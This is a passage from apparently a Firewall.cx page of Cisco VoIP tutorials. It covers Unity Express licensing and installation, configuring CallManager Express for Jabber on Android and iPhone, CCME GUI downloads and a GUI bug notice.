            Evaluation total period:  8 weeks  4 days
            Evaluation period left:  8 weeks  4 days
        License Count: 60 / 0
        License Priority: None
License Store: Evaluation License Storage
StoreIndex:  2  Feature: VMIVR-IVR-SESS  Version: 1.0
        License Type: Evaluation
        License State: Active, Not in Use, EULA not accepted
            Evaluation total period:  8 weeks  4 days
            Evaluation period left:  8 weeks  4 days
        License Count: 60 / 0
        License Priority: None
License Store: Dynamic Evaluation License Storage
StoreIndex:  0  Feature: TCV-USER        Version: 1.0
        License Type: Evaluation
        License State: Active, Not in Use, EULA not accepted
            Evaluation total period:  8 weeks  4 days
            Evaluation period left:  8 weeks  4 days
        License Count: 600 / 0
        License Priority: None

'show license in-use'

The show license in-use command displays information about the licenses that are in use on your Unity Express module. Again, there are no additional parameters for this command:

2911-UnityExpress# show license in-use
StoreIndex:  0  Feature: VMIVR-PORT      Version: 1.0
        License Type: Permanent
        License State: Active, In Use
        License Count: 2 /2
        License Priority: Medium
StoreIndex:  1  Feature: VMIVR-VM-MBX    Version: 1.0
        License Type: Permanent
        License State: Active, In Use
        License Count: 5 /5
        License Priority: Medium

This concludes our Cisco Unity Express License Setup & Installation - Software Activation article.

  • Hits: 62038

Configuring CallManager Express (CME) To Support Cisco Jabber IP Phone for Android & iPhone

cisco cme jabberCisco is continuously developing its CallManager Express product, introducing new features and services to help keep up with its customers' and the market’s demands.

With the rapid increase of the mobile phone market, customer requests for CallManager Express to support them are on the rise. In response, Cisco added support for Apple’s popular iPhone with CallManager Express v8.6 ( IOS 15.1(4)M ), but unfortunately did not include Android support, leaving millions of Android phone users in the dark. 

At the time Cisco Mobile 8.1 & 8.0 was available for iPhone users, allowing them to connect and make phone calls via CME just as any normal softphone client.  Cisco Mobile was later renamed Cisco Jabber.

cisco-cme-jabber-iphones

 

Thankfully, with CallManager Express v9.1 ( IOS 15.2(4)M1 ), Cisco finally added support of the Jabber application for the Android operating system.  Both Cisco Jabber versions (Android and iPhone) use SIP as the communication protocol with CME. SCCP is not used. 

While CME 9.1 now supports both iPhone and Android phones, getting them to work is a different story.

This article will demonstrate how to configure your CallManager Express v9.1 to support Cisco Jabber for both iPhone and Android operating systems.

At the time of writing, the latest version of Cisco Jabber for iPhone is 9.0 (1) and 9.0.1.1911 for the Android operating system.

Cisco ISR 2800 Series CME – No Support for Jabber Android Users

On the 1st of November 2010, Cisco announced its discontinuation of all 2800 series ISR routers and, as a result, will only provide minor software upgrades.

The latest IOS version available for the 2800 series is 15.1(4) which, according to our CME-IOS Matrix, supports CallManager Express v8.6.  

Since support for the Android operating system begins officially with v9.1, the 2800 series CME routers will only be able to support Cisco Jabber for iPhone.  Unfortunately no support for Android is available (yet) for this platform, and we don’t expect to see any in the near future.  

IT Managers and engineers who want to provide CME services to their Android Jabber users must upgrade to the 2900 series platform.

Cisco Jabber For Android – How To Overcome Bugs!

Jabber support for the Android operating system is very new on CME and as such, the Jabber version available in Google’s Play Store might not work properly. 

When we tested Cisco’s Jabber from the Google Play Store using our Samsung Galaxy SII (Model GT-I9100) running Ice-Cream Sandwich 4.0.4, it was not able to connect to our CME v9.1.  We tried the LAN Wi-Fi and even the GSM network (via Anyconnect VPN) but the application failed continuously to register and requested we check our Internet Calling settings.

After consulting with Cisco engineers around the globe, we discovered we had hit a bug on the Android version of Jabber, specific to some Samsung phones running Android 4.0.4. This was later confirmed with some HTC Android phones as well.

However, we managed to obtained an Engineering Special (ES) edition (as Cisco calls it) of Jabber, that overcomes the problems mentioned and works like a charm!  This ES Jabber release is not available through Google’s Play Store, nor from Cisco as a direct download.

Fortunately, Firewall.cx Android users can download the engineering special edition from our Cisco Tools and Applications section!

Configuring CallManager Express To Support Jabber For Android & iPhone

The configuration settings of CME are pretty much identical for both Android and iPhone operating systems.

Since Jabber for CME uses SIP as a communication protocol, it is mandatory to enable SIP registration on CME.  Enabling SIP registration requires special attention to ensure registration is only restricted to the local network or VPN users at most.

Opening SIP registration to public IP’s or untrusted networks is definitely not recommended as it could allow anyone to connect and register to the CallManager Express.

First step is to configure CME to allow calls from SIP to SIP endpoints and enable SIP registrar:

voice service voip
  ip address trusted list
   ipv4 192.168.50.5 255.255.255.255
 allow-connections sip to sip
sip
    bind control source-interface GigabitEthernet0/1
    bind media source-interface GigabitEthernet0/1
 registrar server

The ip address trusted list section is used to list remote client IP addresses which are not part of the local network. This will allow them to register with CME and place or receive calls.  If for example your Android or iPhone connects to the corporate LAN via VPN (AnyConnect VPN) and obtains an IP address on a different network/subnet from CME, it will be necessary to list the VPN IP address or VPN network pool for the phone to register. 

The control source-interface GigabitEthernet0/1 command ensures SIP uses GigabitEthernet 0/1 as the binding interface for all SIP communications. The interface’s IP address will show up as the source IP for all outgoing communications.  All incoming communications are expected to terminate to this interface as well.

Next step is to configure the voice register global section. This section holds key configuration elements for the correct operation of our CME SIP service.

Here we will specify various parameters including: Set SIP registrar to CME mode, source-address for phone registration,  maximum extensions (max-dn), maximum phones (max-pool), set authentication for phone registration and finally create configuration files for all phones (tftp-path, file text & create profile).

voice register global
  mode cme
  source-address 192.168.9.5 port 5060
  max-dn 8
  max-pool 8
  authenticate register
  authenticate realm firewallcx
  tftp-path flash:
  file text
  create profile sync 0033775744721428

Now we can configure our phone extension using the voice register dn command and SIP phone with the voice register pool command:

voice register dn 5
number 778
name Chris-Android 778
label Chris-Android 778
!
voice register pool 1
registration-timer max 720 min 660
id mac 147D.C5AF.79B2
session-transport tcp
type Jabber-Android
number 1 dn 5
username chris password firewallcx
codec g729r8

While most commands are self-explanatory, we’ll focus on the most important:

number 778: This specifies the extension our SIP phone will have.

id mac 147D.C5AF.79B2. This is the Wi-Fi MAC address of our mobile phone. In our example, our Samsung Galaxy SII.

type Jabber-Android.  Here we specify the sip client type. It can either be CiscoMobile-iOS for Apple iPhone users or Jabber-Android for Android users.

codec g729r8: This specifies the codec that will be used for this client. It is possible to use g711ulaw or g711alaw, g722-64k, g729r8 and ilbc.  Each code has different bandwidth requirements and sound quality.  G729r8 and ilbc require 8 and 13kbps-15.2kbps respectively, while the others require 64kbps.  Don’t forget to add the IP overhead to these figures.

Note: When the SIP phone extensions and devices configurations are complete or altered, it is imperative we go to the voice register global section and issue the create profile command.  This ensures the appropriate configuration files on CME are created for our SIP devices.

Cisco Jabber For Android (both 4.0.4 & 2.3) Settings – Configuration Example

Connect to the Google Play Store and search for Cisco Jabber:

cisco jabber android marketstore

After downloading and installing Cisco Jabber for Android, launch the application and click on Begin Setup:

cisco-cme-jabber-5

Next, in the Device ID field, enter the SEP+MAC address (Applications ->Settings->Wi-Fi-> Advanced Wi-Fi) without any spaces or dots. Now, enter your CME IP address in the Server Address field.

You can selectively enable Use mobile data network and Use noncorporate Wi-Fi options.  We always select Use noncorporate Wi-Fi only to ensure the GSM mobile network is not used (especially if your provider charges GSM data).

If necessary, enable Auto Start so that Cisco Jabber starts every time your phone restarts. Now click Verify to register with CallManager Express:

cisco jabber android internet calling settings

 After Cisco Jabber successfully registers with CME, we are presented with the main screen and dial pad:

cisco jabber android dialpad

Cisco Jabber For iPhone Settings – Configuration Example

First we need to verify our phone is connected to the corporate Wi-Fi network and is accessible from CME.

  1. Launch Cisco Jabber and complete the setup wizard.
  2. Enter the Device Name SEP, followed by your MAC address without any dots. e.g SEP147DC5AF79B2
  3. Enter your CME IP address in the TFTP Server field. E.g 192.168.9.5
  4. Turn ON SIP Digest Authentication and enter the username and password configured under the voice register pool section

Following is a screenshot of the complete settings on our iPhone:

cisco jabber iphone internet calling settings

 This concludes our Cisco CallManager Express (CME) Cisco Jabber for Android and iPhone configuration.

  • Hits: 116443

Download Cisco CallManager Express CCME GUI Administration Installation Files

Most engineers are aware that to download and install the latest Cisco CallManager Express (CCME) Graphical User Interface (GUI) files, Cisco requires a registered CCO account with the necessary privileges.  To help alleviate engineers and administrators from locating and downloading these files, we are now providing them free via direct download from Firewall.cx - no registration required!

We've conveniently packed in one zip file CallManager Express GUI files for CCME v3.3, CCME v4.1.0.2, CCME v4.2, CCME v7.1.0.1, CCME v8, CCME v8.5 and CCME v8.6.

Please note that CCME GUI v8.8 and v9.0 contain bugs and are pretty much useless as no CCME modifications can be saved using these GUI versions, and therefore you are advised to use CCME v8.6 if the GUI interface is absolutely necessary.  For more information on these bugs, please visit our CCME v8.8 & v9.0 bug announcement. CCME GUI version 9.1 was not yet published at the time of this post.

Users can download CCME GUI files by visiting our Cisco Download section.

Step-by-step installation instructions for the CCME GUI are available at the following Firewall.cx articles:

1) CallManager Express GUI Software Installation & Configuration - Part 1
2) CallManager Express GUI Software Installation & Configuration - Part 2

Users who wish to check their IOS CCME version can use the show telephony-service command:

R1# show telephony-service
CONFIG (Version=8.6)
=====================
Version 8.6
Max phoneload sccp version 17
Max dspfarm sccp version 18
Cisco Unified Communications Manager Express
For on-line documentation please see:
http://www.cisco.com/en/US/products/sw/voicesw/ps4625/tsd_products_support_series_home.html
protocol mode default
ip source-address 10.0.0.1 port 2000
ip qos dscp:
 ef (the MS 6 bits, 46, in ToS, 0xB8) for media
 cs3 (the MS 6 bits, 24, in ToS, 0x60) for signal
 af41 (the MS 6 bits, 34, in ToS, 0x88) for video
 default (the MS 6 bits, 0, in ToS, 0x0) for serviceservice directed-pickup
load 7945 SCCP45.9-1-1SR1S
max-ephones 30
max-dn 100
max-conferences 8 gain -6
dspfarm units 0
dspfarm transcode sessions 0
conference software
privacy
no privacy-on-hold
hunt-group report delay 1 hours
Number of hunt-group configured: 1
hunt-group logout DND
max-redirect 10
voicemail 88
cnf-file location: flash:
cnf-file option: PER-PHONE
network-locale[0] U1   (This is the default network locale for this box)
network-locale[1] US
network-locale[2] US
network-locale[3] US
network-locale[4] US
user-locale[0] US    (This is the default user locale for this box)
user-locale[1] US
user-locale[2] US
user-locale[3] US
user-locale[4] US
srst mode auto-provision is OFF
srst ephone template is 0
srst dn template is 0
srst dn line-mode single
phone service videoCapability 1
moh flash:north-gate.wav
time-format 24
date-format dd-mm-yy
timezone 24 GTB Standard/Daylight Time
url services http://10.0.0.10/
transfer-pattern 6.
transfer-pattern 41
after-hours pstn-prefix 4 4
night-service code *1234
keepalive 30 auxiliary 30
timeout interdigit 4
timeout busy 10
timeout ringing 180
timeout transfer-recall 0
timeout ringin-callerid 8
timeout night-service-bell 12
caller-id name-only: enable
system message Firewall.cx
web admin system name admin  secret 5 $1$QuGK$tLHc4.7jdhWlzp9S9KHjC.
edit DN through Web:  enabled.
edit TIME through web:  enabled.
background save interval 10 minutes
Log (table parameters):
     max-size: 150
     retain-timer: 15
create cnf-files version-stamp 7960 May 12 2011 22:29:16
transfer-system full-consult
transfer-digit-collect new-call
multicast moh 239.10.16.4 port 2000
auto assign 1 to 100
auto assign 1 to 15
local directory service: enabled.
Extension-assigner tag-type ephone-tag.

The table below illustrates the Cisco IOS releases, CallManager Express versioning and CallManager Express GUI version that should be used or installed on the device (router or UC500):

Cisco IOS Release
Cisco Unified CME Version
Cisco Unified CME GUI Version
Specifications Link
15.2(2)T 9.0 9.0.0.0 *Buggy* CME 9.0 Link
15.1(4)T
8.6
8.6.0.0
CME 8.6 Link
15.1(3)T
8.5
8.5.0.0
CME 8.5 Link
15.1(2)T
8.1
8.1.0.0
CME 8.1 Link
15.1(1)T
8.0
8.0.0.0
CME 8.0 Link
15.0(1) XA
8.0
8.0.0.0
CME 8.0 Link
15.0(1) M
7.1
7.1.1.0
CME 7.1 Link
12.4(24)T
7.1
7.1.0.0
CME 7.1 Link
12.4(22)T
7.0(1)
7.0.0.1
CME 7.0 Link
12.4(20)T
7.0
7.0.0.0
CME 7.0 Link
12.4(15)XZ
4.3
4.3.0.0
CME 4.3 Link
12.4(11)XW9
4.2
4.2.0.4
CME 4.2 Link
12.4(15)T
4.1
4.1.0.2
CME 4.1 Link
12.4(11)T
4.0(2)
4.0.3.1
CME 4.0(2) Link
12.4(9)T
4.0(0)
4.0.0.1
CME 4.0 Link
12.4(6)T
3.4
3.4.0.1
CME 3.4 Link




  • Hits: 177762

Cisco Unity Express Installation/Setup - Service Module & Initial Web Interface Configuration - Part 2

Mentioned in Part-1 of our Cisco Unity Express installation article, the Cisco Unity Express setup procedure is identical for ISM-SRE-300-K9 and SM-SRE-700-K9 modules. We will be using the smaller ISM-SRE-300-K9 for this article. The only notable difference in the CallManager Express configuration will be the module’s interface that connects to CallManager Express.

Users interested can also visit our Cisco VoIP/CCME - CallManager Section where they'll find more articles covering Cisco VoIP, CallManager, CallManager Express and Unity Express.

For the SRE-300, the module’s interface name is interface ISM0/0, whereas for the SM-SRE-700 it is service-module sm2/0. Both interfaces are GigabitEthernet, connected via each router’s internal bus.

The ISM-SRE-300-K9 module is configured with its own IP address and acts as a separate machine inside the router. Before we can begin configuring Unity Express, preinstalled by Cisco, we must configure IP connectivity with the router so we can then access the ISM-SRE-300-K9 module and initialize the Unity Express setup.

When physically installing an SRE module, CCME will automatically make two additional interfaces available in its configuration. For the ISM-SRE-300-K9, they are interface ISM0/0 and interface ISM0/1, whereas for the SM-SRE-700 they are interface SM2/0 and interface SM2/1.

First step is to configure IP connectivity between the router (CCME) and Unity Express. This is achieved by configuring interface ISM0/0 with an IP address (ISM-SRE-300-K9) or interface SM2/0 for the SM-SRE-700.

Our CCME router has two IP addresses, 192.168.9.5/24 (Data VLAN) and 192.168.10.5/24 (Voice VLAN). When configuring an IP address on Unity Express, there is the choice of assigning one part of the existing network(s) (192.168.9.0 or 192.168.10.0) or one that is on a completely different network. 

It is a common practice to configure Unity Express with an IP address that is part of the Voice VLAN, that is, 192.168.10.0/24 in our example:

interface ISM0/0
 description Unity-Express-Module
 ip unnumbered GigabitEthernet0/0.2
 ip virtual-reassembly in
 service-module ip address 192.168.10.10 255.255.255.0
 !Application: CUE Running on ISM
 service-module ip default-gateway 192.168.10.5

In the above configuration commands, we’ve configured our Unity Express module with IP address 192.168.10.10 and a default-gateway of 192.168.10.5 (CCME’s Voice VLAN IP address), this is because the Unity Express module is physically connected to our router’s internal interfaces (ISM) and therefore must use one of the router’s IP interfaces as a default-gateway.

The ip unnumbered <interface> command allows the Cisco Unity Express module to use a network subnet IP address associated with a specific router egress port such as GigabitEthernet0/0.2. This configuration method requires a static route to the service-engine interface. The router interface associated with the Cisco Unity Express interface (GigabitEthernet 0/0.2) must be in an "up" state at all times for communication between the router and module.

At this point we should note that GigabitEthernet0/0 is configured as a trunk link with our switch. This configuration method is known as ‘Router on a Stick’ and allows all configured VLANs to pass through a single interface. For more information on this configuration method, please refer to our Router-on-a-Stick article.

Following is the configuration of our GigabitEthernet 0/0 interface:

interface GigabitEthernet0/0
 no ip address
 duplex auto
 speed auto
!
interface GigabitEthernet0/0.1
 description Data-VLAN
 encapsulation dot1Q 1 native
 ip address 192.168.9.5 255.255.255.0
!
interface GigabitEthernet0/0.2
 description Voice-VLAN
 encapsulation dot1Q 2
 ip address 192.168.10.5 255.255.255.0
!

Next step is to create a static route to Unity Express’s IP address via the internal service module (ISM0/0):

2911-CCME (config)# ip route 192.168.10.10 255.255.255.255 ISM0/0

At this point, we should be able to ping Unity Express’s IP address:

2911-CCME# ping 192.168.10.10
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.10.10, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms

CallManager Express - Telephony-Service Configuration

Next step is to configure our CallManager Express web-based administrator user (if not already configured), voicemail extension on CallManager Express, voicemail dial-peer and Message Waiting Indicator (MWI) extensions used to enable/disable the red light (message waiting indicator) on the IP phone when there is a message waiting in the user’s voice mailbox:

2911-CCME(config)# telephony-service
2911-CCME(config-telephony)# web admin system name administrator password firewallcx
2911-CCME(config-telephony)# voicemail 810
2911-CCME(config-telephony)# create cnf
Creating CNF files
2911-CCME(config-telephony)# exit
2911-CCME(config)#
2911-CCME(config)# dial-peer voice 101 voip
2911-CCME(config-dial-peer)# description Unity Express - VoiceMail
2911-CCME(config-dial-peer)# destination-pattern 810
2911-CCME(config-dial-peer)# session protocol sipv2
2911-CCME(config-dial-peer)# session target ipv4:192.168.10.10
2911-CCME(config-dial-peer)# dtmf-relay rtp-nte
2911-CCME(config-dial-peer)# codec g711ulaw
2911-CCME(config-dial-peer)# no vad
2911-CCME(config-dial-peer)# exit
2911-CCME(config)#
2911-CCME(config)# ephone-dn  1
2911-CCME(config-ephone-dn)# number 800... no-reg both
2911-CCME(config-ephone-dn)# mwi on
2911-CCME(config-ephone-dn)# exit
2911-CCME(config)#ephone-dn  2
2911-CCME(config-ephone-dn)# number 801... no-reg both
2911-CCME(config-ephone-dn)# mwi off
2911-CCME(config-ephone-dn)#exit
2911-CCME(config)#

Now we must enable the IP http & http secure server and ensure the http access-lists (if any) allow the login of Unity Express’s IP address:

2911-CCME(config)# ip http server
2911-CCME(config)# ip http access-class 50
2911-CCME(config)# ip http authentication local
2911-CCME(config)# ip http secure-server
2911-CCME(config)# ip http timeout-policy idle 60 life 86400 requests 10000
2911-CCME(config)# ip http path flash:
2911-CCME(config)# access-list 50 remark -=[Control CUCME Web Access]=-
2911-CCME(config)# access-list 50 permit 192.168.9.0 0.0.0.255
2911-CCME(config)# access-list 50 permit host 192.168.10.10
2911-CCME(config)# access-list 50 remark

Failing to configure the above commands will result in the failure of Unity Express to log into the CallManager Express system and not able to complete the Unity Express initialization process. In our setup, network 192.168.9.0 is the Data VLAN, whereas host 192.168.10.10 is our Unity Express IP address.

Unity Express Module Administrator User Configuration

Final step involves login into the Unity Express CLI and creating the admin user to be used for the web-based initialization process that follows:

2911-CCME# service-module ism 0/0 session

Trying 192.168.10.5, 2131 ... Open
**************************************************
The administrator user ID cannot be empty.
**************************************************
Enter administrator user ID:
  (user ID): admin    
Enter password for admin:
  (password):
Confirm password for admin by reentering it:
  (password):

SYSTEM ONLINE
se-192-168-10-10#
se-192-168-10-10# config terminal
Enter configuration commands, one per line.  End with CNTL/Z.
se-192-168-10-10(config)# hostname 2911-UnityExpress
2911-UnityExpress(config)# exit
2911-UnityExpress# wr
2911-UnityExpress# exit

Session closed

[Connection to 192.168.10.5 closed by foreign host]

We are now ready to connect to Unity Express and begin the module’s initialization.

Unity Express Web Interface Initialization & Configuration

Open a web browser and enter the IP address of the Cisco Unity Express module, in our case this is 192.168.10.10. The Unity Express is yet to be initialized and therefore will only allow administrator login.

Using the username and password entered above, we log in to the Unity Express administration panel:

Upon logon, we need to select the appropriate Call Agent Integration from the drop-down menu, in our case Cisco Unified Communication Manager Express:

unity express initialization installation wizard

After the selection, the system will warn that it will delete Jtapi related configuration and reboot. Do not be alarmed and click on OK to continue:

cisco unity express installation

If you’re connected to the unity express CLI, you’ll also be able to view the whole reboot process. Here is the session we captured during this reboot:

MONITOR SHUTDOWN...
INIT: Sending processes the TERM signal
Rebooting ...
shutdown: sending all processes the TERM signal...
platform.config:    INFO platform.config server output END
trace:    INFO trace daemon output END
rbcp:    INFO rbcp daemon output END
shutdown: sending all processes the KILL signal.
shutdown: turning off swap
shutdown: unmounting all file systems
Please stand by md: stopping all md devices.
while rebooting the system.
ACPI: PCI interrupt for device 0000:01:00.0 disabled
ACPI: PCI interrupt for device 0000:01:01.0 disabled
Restarting system.
Aug 12 11:39:31.024: %LINEPROTO-5-UPDOWN: Line protocol on Interface ISM0/1, changed state to down
Aug 12 11:39:31.056: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
Initializing memory. Please wait...
Memory initialization OK. Continue...
Aug 12 11:39:40.080: %LINEPROTO-5-UPDOWN: Line protocol on Interface ISM0/1, changed state to up
DDR Memory 0512 MB detected
Genuine Intel(R) processor              1.06GHz
BIOS ISM 2.6,  BIOS Build date: 10/16/2009
System now booting...
Authenticating boot loader....  
Secondary Boot Loader authenticated - booting....  
Please enter '***' to change boot configuration:
Detect and Initialze network device
Backup current platform configurations....
SRE step 1 - SM registration...
Response - no installation needed (len: 422)
SRE Installation Not Needed
Restoring orignial configuration...
Updating flash with bootloader configuration.
Please wait .................. done.
Loading disk:/bzImage ...
Aug 12 11:39:58.512: %SM_INSTALL-6-INST_RBIP: ISM0/0 received msg: RBIP Registration RequestVerifying ... done.
Starting Kernel.
Platform: ism
sd 0:0:0:0: [sda] Assuming drive cache: write through
sd 0:0:0:0: [sda] Assuming drive cache: write through
Verifying application level programs
Application level programs verification OK!
INIT: version 2.86 booting
mounting proc fs ...
mounting sys fs ...
mounting /dev/shm tmpfs ...
reiser root fs ...
Reiserfs super block in block 16 on 0x801 of format 3.6 with standard journal
Blocks (total/free): 1002928/899804 by 4096 bytes
Filesystem is clean
Filesystem seems mounted read-only. Skipping journal replay.
Checking internal tree..finished
Aug 12 11:40:10.080: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
FILESYSTEM CLEAN
Remounting the root filesystem read-write...
kernel.sem = 1900 4000 32 100
vm.overcommit_memory = 1
                Welcome to Cisco Service Engine
Setting the system time from hardware clock
********** rc.aesop ****************
Populating resource values from /etc/ism_rsrc_file
Populating resource values from /etc/default_rsrc_file
Populating resource values from /etc/products/cue/default_rsrc_file
Populating resource values from /etc/products/cue/ism_rsrc_file
WARNING: Found files describing previous failures...
         Saving them as /var/javacores/*.prev
Processing manifests . . . . . . . . . . . . . complete
==> Management interface is eth0
==> Management interface is eth0
Serial Number: FOC162427RV
INIT: Entering runlevel: 2
********** rc.post_install ****************
INIT: Switching to runlevel: 4
INIT: Sending processes the TERM signal
==> Starting CDP
STARTED: ntp_startup.sh
STARTED: LDAP_startup.sh
STARTED: SQL_startup.sh
STARTED: dwnldr_startup.sh
STARTED: HTTP_startup.sh
STARTED: probe
STARTED: fndn_udins_wrapper
STARTED: superthread_startup.sh
STARTED: /usr/wfavvid/run-wfengine.sh
STARTED: /usr/bin/launch_ums.sh
 Waiting 74 ...
SYSTEM ONLINE

2911-UnityExpress#

While Unity Express reboots, the GUI interface shows a messaging explaining that the system is reloading and will automatically try to reconnect once the reboot cycle is complete:

cisco unity express reboot

When the system is back online it is necessary to log back in using the Unity Express administrator account previously created (admin).

After the logon process is complete, we are presented with the CUCME Logon screen. This screen is to provide the credentials so that Unity Express can log on to the CCME and obtain user account configuration. This account is the same account created under the Telephony-Service section of CCME (shown previously). We can also provide the hostname or IP address of CCME. We selected the IP address of the Voice VLAN, 192.168.10.5:

cisco unity express cme login credentials

In case of logon failure, Unity Express will present a pop-up window explaining that it failed to log on. In such a case, check the CCME web user under telephony-services and ensure the rest of the required commands are present.

As soon as Unity Express’s login to CCME is complete, it will present all users it finds and allow the administrator to associate the Primary Extension for each one. Here, you can also enable Mailbox creation, set a specific user as an Administrator or set CFNA/CFB (Call Forward No Answer / Call Forward Busy) so that incoming calls to the user are directed to his/her voicemail when not answered or busy:

cisco unityexpress import users

Clicking on Next takes us to the Defaults page where default settings are configured for all new users and mailboxes created from now on. Ensure the System Default Language is set to English (in most cases) and take note of the Password & PIN Options.  The rest can be changed as required:

cisco unityexpress pin configuration

Next page coves the handling of calls to Unity Express. Here you set the Voice Mail Number. This same number should be configured under Telephony-Service in CallManager Express (covered earlier in this article). MWI ON/OFF should be automatically configured, if not, select the correct extensions configured.  SIP MWI should be left as default unless there is a reason to change it:

cisco unityexpress call handling

A final screen is presented where there is an option to finalize the configuration and save it to the Unity Express startup-config. Review as necessary and click on Finish to begin the process:

cisco unityexpress configuration summary

As the saving of the configuration is in progress, Unity Express executes a number of scripts in the background and makes the necessary modifications. An update of this progress is shown on the web browser screen:

cisco-unityexpress-p2-12

Finally, Unity Express will present a summary of the setup and inform the administrator of all successes and failures:

cisco unityexpress status

In our example, Unity Express failed to create and allocate a voice mailbox to our user due to the absence of an active mailbox license.

Unity Express licensing will be covered in a separate article, along with more details and information.

This completes a two-part article covering the physical installation of ISM300 and SME700 Service Engine Ready modules with Unity Express 8.0.

  • Hits: 85176

Cisco Unity Express Installation & Setup - ISM-SRE-300-K9 & SM-SRE-700-K9 Installation – Part 1

Unity Express is a popular add-on for Cisco Unified Communication Manager Express (CallManager Express) and Cisco Unified Communication Manager (CUCM), adding advanced auto attendant functionality with complex menu support through Unity Express voice scripts, user voice mail and advanced notification methods such as emailing voice messages directly to users, calling users to notify them about their new voice messages and much more.

Users interested can also visit our Cisco VoIP/CCME - CallManager Section where they'll find more articles covering Cisco VoIP, CallManager, CallManager Express and Unity Express.

Cisco Unity Express Hardware Platforms

Unity Express is offered on a variety of hardware platforms supporting the Cisco 2800, 3800, 2900 and 3900 series routers. Depending on the router and capacity required, Unity Express is available as a card that fits in an Advanced Integration Module (AIM) slot (2800, 3800 series), Internal Service Module (ISM) (2900, 3900 series), Network Module (NM-CUE-EC) for 3700, 2800 & 3800 series that support network modules, Enhanced Network Module (NME) for all 3700, 2800, 3800, and 2900, 3900 series routers supporting network modules and finally the newer Service Module (SM) supported only on ISRG2 routers (2900 and 3900 series), again that are able to accept network modules.

The following link contains a table of the available Unity Express hardware modules, and supported platforms:

We were lucky to get our hands on two different Unity Express modules, the ISM-SRE-300-K9 installed on a Cisco 2911 CCME, and the larger SM-SRE-700-K9 installed into a Cisco 3945 CCME.

The following table shows the technical specifications of both ISM-SRE-300-K9 & SM-SRE-700-K9:

Feature

Cisco SRE 300 ISM

Cisco SRE 700 SM

Form Factor

Internal Service Module (ISM)

Service Module (SM)

CPU

Intel Processor 1.06Ghz

Intel Core 2 Solo, 1.86Ghz

DRAM

512MB

4GB

Compact Flash Memory

4GB internal USB Flash-memory module

2GB internal USB flash-memory module

Hard Disk

None

One 500GB SATA 5400rpm HDD

Mailboxes Supported

100

500

Concurrent Voicemail and Automated-Attendant Ports and Sessions

10

32

Meet The ISM-SRE-300-K9

While the configuration procedure for both modules is identical, physically there are many differences that cannot be overlooked.

cisco-voice-ue-ISM-SRE-300-K9

The ISM-SRE-300 is the smallest internal module available for the newer ISRG2 routers but certainly does not hold back in performance or capabilities. With a whopping 100 mailbox support and up to 10 concurrent voice ports, its capable to deliver enterprise class services

As an ISM module, it is installed by opening the router’s lid and connecting it to the special ISM port located on the back left area of the main board or front right area, depending on which way the router is facing. On our Cisco 2911 ISR-G2 CallManager Express  router, we've marked the ISM connector yellow in the picture taken below:

cisco 2900 motherboard and connectors

In the picture above, we see our Cisco 2911 router, open and ready to accept the ISM module. Note that there is only one ISM connector on the main board, which means you can only install one ISM module.

With every ISM module, Cisco provides 4 hex metal M-F standoffs to be placed in the area circled in red.  To install the hex metal M-F standoffs, it is necessary to remove the factory screws, and replace them with the hex metal M-F standoffs. Finally, after the ISM-SRE-300 is in place and connected, use the screws to tighten the board against the hex metal standoffs.

This is what the 2911 router looks like inside, after the ISM-SRE-300 is firmly placed in its position and secured with the necessary screws:

cisco 2901 2911 motherboard connects & ISM module

We’ve also add a few more items, including a High-Density Packet Voice Video Digital Signal Processor Module (PVDM3-16) and three VIC2 cards used to connect to the public switching network (ISDN and PSTN Lines).

Meet The SM-SRE-700-K9

The SM-SRE-700-K9 is the big SM brother targeted for larger enterprises with support up to 500 mail boxes and expandable to 32 concurrent voice ports. Looking at the picture we took during the installation, it is evident we are talking about a whole server on a single board – the only thing missing is a VGA card!  The SM-SRE-700-K9 is capable of running VMware vSphere Hypervisor and host Windows machines running one or more Windows Server operating system!

cisco  SM-SRE-700-K9 network module

The system’s hard disk drive is visible on the lower right area and next to it there is an empty slot ready to accept a second disk drive. On the left is the system’s DRAM – 4 GB in total (2x2GB) and we suspect the central processor is located to the right side of the DRAM memory as there’s a sticker right behind the empty hdd slot warning that the heat sink gets hot.

Installing the SM-SRE-700-K9 is a lot simpler as it does not require opening the router to access its mainboard. Simply locate an empty SM slot, remove the blank plate and insert the SM-SRE-700-K9 inside:

SM-SRE-700-K9 installation

 Once neatly tucked in its place, we are ready to power up the Cisco 3945 router and being the setup.

cisco cme 3945 installation

 Next: The second part of our Unity Express installation guide.  Part-2 covers the initial configuration of CallManager Express, necessary to establish communication with the Unity Express module, IP configuration, initilization of the setup procedure plus much more.

The article provides step-by-step instructions with all necessary details and as always includes screenshots of the setup process.  Click here to read Part-2 of our Unity Express Setup/Installation.

 

  • Hits: 72649

Cisco CallManager Express CME v8.8 & v9.0 GUI Web Interface Bug

Cisco's CallManager Express GUI interface is an important part of the CallManager Express product as it provides the ability to administer CME via a web browser. Generally, the CME GUI interface is extremely useful as it helps save valuable time to setup new IP Phones or make changes to an existing setup.

On the other hand the CME GUI interface can also prove to be a big waist of time, that is, if your trying to install CME GUI versions 8.8 or 9.0.

Wondering why? 

Simply put, there is a massive bug in these two CME GUI versions that render the whole web interface useless.  We spent valuable time trying to troubleshoot a very weird problem: After installing and setting up the web interface, we couldn't make any changes to the ip phones, extensions or any functionality supported by the GUI interface!

When trying to save our changes, the system would return back to the main menu,  totally ignoring the changes and without saving anything!

After much frustration, trying different IOS images and GUI interfaces, we contacted Cisco so they could share some light and help us diagnose the problem.

To our surprise, the problem was a bug related issue which is yet to be fixed!  The only work-around, if you require a functional administrative web-interface, is to downgrade to CME IOS 151-4.M4 and GUI version 8.6.

The sad part of this story is that Cisco has failed to place any notice in their relevant download section, so engineers are downloading GUI files for CME versions 8.8 and 9.0, without any clue of what's to come!  As a result, thousands of cases have been opened with Cisco, all around the same problem.

The Bug ID assigned for this issue is CSCtz35753, but don't bother searching for more information on it, Cisco is not disclosing any information  at this point of time - it's top secret!

cisco-voice-cme-gui-bug-CSCtz35753

  • Hits: 36471

Connecting & Configuring SPA8000 with UC500, 520, 540, 560 & CallManager Express (CCME) - Low Cost FXS Analog Ports

When it comes to connecting multiple analog phones to VoIP systems like Cisco’s Unified Communication Manager Express (CallManager Express) or UC500 series (Includes UC520, UC540, UC560), the first thing that usually comes to mind is the expensive ATA 186/188 or newer ATA 187 devices (double the price of the older 186/188) that provide only two FXS analog ports per device.

